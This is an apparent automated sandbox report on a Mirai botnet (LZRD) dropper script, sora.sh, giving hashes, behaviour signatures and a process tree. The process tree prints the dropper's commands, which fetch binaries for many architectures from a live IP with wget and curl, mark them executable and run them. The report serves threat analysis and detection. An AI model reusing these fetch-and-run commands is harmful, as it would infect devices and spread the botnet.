Analysis

  • max time kernel
    149s
  • max time network
    175s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    29-08-2024 20:19

General

  • Target

    sora.sh

  • Size

    1KB

  • MD5

    4bad6b7a8f3a112f1e8a64415b2c5e57

  • SHA1

    80386ebec3b511cd2a07da88e300a62590b8d889

  • SHA256

    4483a53f61944b8183d1941626bb43ff3a0f8196930441fe4c791a76cd87fb77

  • SHA512

    da9c99687356c636a26e11083032cee8d31f7105e64ade4d20f54e3ba22085ed9a5749674684622dce428287410b404b84d546a91e050afadf0b7b7485647aed

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Contacts a large (18459) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks CPU configuration 1 TTPs 10 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 51 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sora.sh
    /tmp/sora.sh
    1⤵
    • Writes file to tmp directory
    PID:650
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.x86
      2⤵
      • Writes file to tmp directory
      PID:652
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.x86
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:705
    • /bin/cat
      cat sora.x86
      2⤵
        PID:715
      • /bin/chmod
        chmod +x robben sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
        2⤵
          PID:717
        • /tmp/robben
          ./robben Payload
          2⤵
          • Executes dropped EXE
          PID:720
        • /usr/bin/wget
          wget http://154.216.17.67/bins/sora.mips
          2⤵
          • Writes file to tmp directory
          PID:722
        • /usr/bin/curl
          curl -O http://154.216.17.67/bins/sora.mips
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:731
        • /bin/cat
          cat sora.mips
          2⤵
            PID:733
          • /bin/chmod
            chmod +x robben sora.mips sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
            2⤵
              PID:734
            • /tmp/robben
              ./robben Payload
              2⤵
              • Executes dropped EXE
              PID:735
            • /usr/bin/wget
              wget http://154.216.17.67/bins/sora.mpsl
              2⤵
              • Writes file to tmp directory
              PID:738
            • /usr/bin/curl
              curl -O http://154.216.17.67/bins/sora.mpsl
              2⤵
              • Checks CPU configuration
              • Reads runtime system information
              • Writes file to tmp directory
              PID:741
            • /bin/cat
              cat sora.mpsl
              2⤵
                PID:749
              • /bin/chmod
                chmod +x robben sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
                2⤵
                  PID:751
                • /tmp/robben
                  ./robben Payload
                  2⤵
                  • Executes dropped EXE
                  PID:752
                • /usr/bin/wget
                  wget http://154.216.17.67/bins/sora.arm4
                  2⤵
                    PID:754
                  • /usr/bin/curl
                    curl -O http://154.216.17.67/bins/sora.arm4
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:761
                  • /bin/cat
                    cat sora.arm4
                    2⤵
                      PID:766
                    • /bin/chmod
                      chmod +x robben sora.arm4 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
                      2⤵
                        PID:768
                      • /tmp/robben
                        ./robben Payload
                        2⤵
                        • Executes dropped EXE
                        PID:769
                      • /usr/bin/wget
                        wget http://154.216.17.67/bins/sora.arm5
                        2⤵
                        • Writes file to tmp directory
                        PID:771
                      • /usr/bin/curl
                        curl -O http://154.216.17.67/bins/sora.arm5
                        2⤵
                        • Checks CPU configuration
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:778
                      • /bin/cat
                        cat sora.arm5
                        2⤵
                          PID:781
                        • /bin/chmod
                          chmod +x robben sora.arm4 sora.arm5 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
                          2⤵
                            PID:782
                          • /tmp/robben
                            ./robben Payload
                            2⤵
                            • Executes dropped EXE
                            PID:783
                          • /usr/bin/wget
                            wget http://154.216.17.67/bins/sora.arm6
                            2⤵
                            • Writes file to tmp directory
                            PID:784
                          • /usr/bin/curl
                            curl -O http://154.216.17.67/bins/sora.arm6
                            2⤵
                            • Checks CPU configuration
                            • Reads runtime system information
                            • Writes file to tmp directory
                            PID:785
                          • /bin/cat
                            cat sora.arm6
                            2⤵
                              PID:786
                            • /bin/chmod
                              chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
                              2⤵
                                PID:787
                              • /tmp/robben
                                ./robben Payload
                                2⤵
                                • Executes dropped EXE
                                • Reads runtime system information
                                PID:788
                              • /usr/bin/wget
                                wget http://154.216.17.67/bins/sora.arm7
                                2⤵
                                • Writes file to tmp directory
                                PID:789
                              • /usr/bin/curl
                                curl -O http://154.216.17.67/bins/sora.arm7
                                2⤵
                                • Checks CPU configuration
                                • Reads runtime system information
                                • Writes file to tmp directory
                                PID:790
                              • /bin/cat
                                cat sora.arm7
                                2⤵
                                  PID:791
                                • /bin/chmod
                                  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
                                  2⤵
                                    PID:792
                                  • /tmp/robben
                                    ./robben Payload
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies Watchdog functionality
                                    • Reads runtime system information
                                    PID:793
                                  • /usr/bin/wget
                                    wget http://154.216.17.67/bins/sora.ppc
                                    2⤵
                                    • Writes file to tmp directory
                                    PID:797
                                  • /usr/bin/curl
                                    curl -O http://154.216.17.67/bins/sora.ppc
                                    2⤵
                                    • Checks CPU configuration
                                    • Reads runtime system information
                                    • Writes file to tmp directory
                                    PID:801
                                  • /bin/cat
                                    cat sora.ppc
                                    2⤵
                                      PID:802
                                    • /bin/chmod
                                      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
                                      2⤵
                                        PID:803
                                      • /tmp/robben
                                        ./robben Payload
                                        2⤵
                                        • Executes dropped EXE
                                        PID:804
                                      • /usr/bin/wget
                                        wget http://154.216.17.67/bins/sora.m68k
                                        2⤵
                                        • Writes file to tmp directory
                                        PID:806
                                      • /usr/bin/curl
                                        curl -O http://154.216.17.67/bins/sora.m68k
                                        2⤵
                                        • Checks CPU configuration
                                        • Reads runtime system information
                                        • Writes file to tmp directory
                                        PID:807
                                      • /bin/cat
                                        cat sora.m68k
                                        2⤵
                                          PID:808
                                        • /bin/chmod
                                          chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
                                          2⤵
                                            PID:809
                                          • /tmp/robben
                                            ./robben Payload
                                            2⤵
                                            • Executes dropped EXE
                                            PID:810
                                          • /usr/bin/wget
                                            wget http://154.216.17.67/bins/sora.sh4
                                            2⤵
                                            • Writes file to tmp directory
                                            PID:812
                                          • /usr/bin/curl
                                            curl -O http://154.216.17.67/bins/sora.sh4
                                            2⤵
                                            • Checks CPU configuration
                                            • Reads runtime system information
                                            • Writes file to tmp directory
                                            PID:815
                                          • /bin/cat
                                            cat sora.sh4
                                            2⤵
                                              PID:816
                                            • /bin/chmod
                                              chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.sh4 sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa
                                              2⤵
                                                PID:817
                                              • /tmp/robben
                                                ./robben Payload
                                                2⤵
                                                • Executes dropped EXE
                                                PID:818

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • /tmp/robben

                                              Filesize

                                              30KB

                                              MD5

                                              bcff8f405bdd93b8488e6f6aca117a32

                                              SHA1

                                              8b32a1dea70be2c76830e3808f70ad62eb3b1250

                                              SHA256

                                              67180595f06f283c60b26bffa32965d897f0234e5ab8d9fe5510773b3712f396

                                              SHA512

                                              5d9e20aeb055eb0c535db9c42d4ccb9f68342b196f9816e1f634147c63dcf4b1dedf5be0b8f7b2ade2676cff752e2418e9b446804fee5a61a24e7a57c845c48a

                                            • /tmp/robben

                                              Filesize

                                              31KB

                                              MD5

                                              131fc41fbe66493277e3155f50b9fce5

                                              SHA1

                                              0bbb17cb882e34dc82e51862f8245f3187664beb

                                              SHA256

                                              d761406aa603a32889188df5e6b444a74d6412903a4979a5814067494fd5ca1f

                                              SHA512

                                              de380e902f115a9f65ae22a5ccdd57f9210d59035bcf44615ee04df8db993c32ed1105476b30e4bdde27a3e2671532465f13de60c51514cf91e50d2957f0c247

                                            • /tmp/robben

                                              Filesize

                                              33KB

                                              MD5

                                              8652e70ebc913d0078f59b2526a40d36

                                              SHA1

                                              1227de6168a2bcb0ab6c20c6dd0c3277ff8b45d4

                                              SHA256

                                              cb68624a8c7366fb3ebab2e45dcc8b119001e562c8a18a66b2afc5067099fbcf

                                              SHA512

                                              ef4032a66c938f322422d22de399aa09811720c016645f74e7b312591687f73f5d9a630a89bbf706550f256ac89534542c44252d916ce9a1e4117911145dc5c3

                                            • /tmp/robben

                                              Filesize

                                              212B

                                              MD5

                                              45e588171939a0780c48755918b1cd74

                                              SHA1

                                              6c33e64b1a43fb6752026fd1254cac740e7c3243

                                              SHA256

                                              770e501d0a52805862fd689d9832d9001926093503ddeb42bf28826c3509c535

                                              SHA512

                                              fe414d5969a9cc3fb54e26ea145ac31f8114988821c5c30a18b5f3f2a74b5c9146764bd17746d49c1d823a885043ef1d2b4b359503fc5f8dbe818cb978789770

                                            • /tmp/robben

                                              Filesize

                                              27KB

                                              MD5

                                              00d6529558e66184baaf1b0f21e59739

                                              SHA1

                                              3b9db5227c48f501573ea9b626c5c765a17e7c61

                                              SHA256

                                              fc2061d2e2a67d777a585f091cc515a405a87dede46dd7f6d8e0bf98ef73c76d

                                              SHA512

                                              49f62522017eef1de00272e61c9ae02e05ec1f43ac510290fda4b978a7b9ae28dddbbcbe769e1def88817b2ede79cd86feff3d1514352f21999acd752b4964fb

                                            • /tmp/robben

                                              Filesize

                                              71KB

                                              MD5

                                              a0b83eba33da68f09402235338d316a8

                                              SHA1

                                              15f3e890997e3b7f21c16eb1b0462bdf4ed11d61

                                              SHA256

                                              eabcddb49e53ab1bb06e269fe11702f93304fdf2e1ba4bb4abd2f221a1b98507

                                              SHA512

                                              2346d6f17ac43d9ac49d755b9b6ef94deec68ca6f16b67ed273081b747215ecedaef5e702965297e0d8d1f621f08182b76db2d2e6b32814beab7db9c78c60e79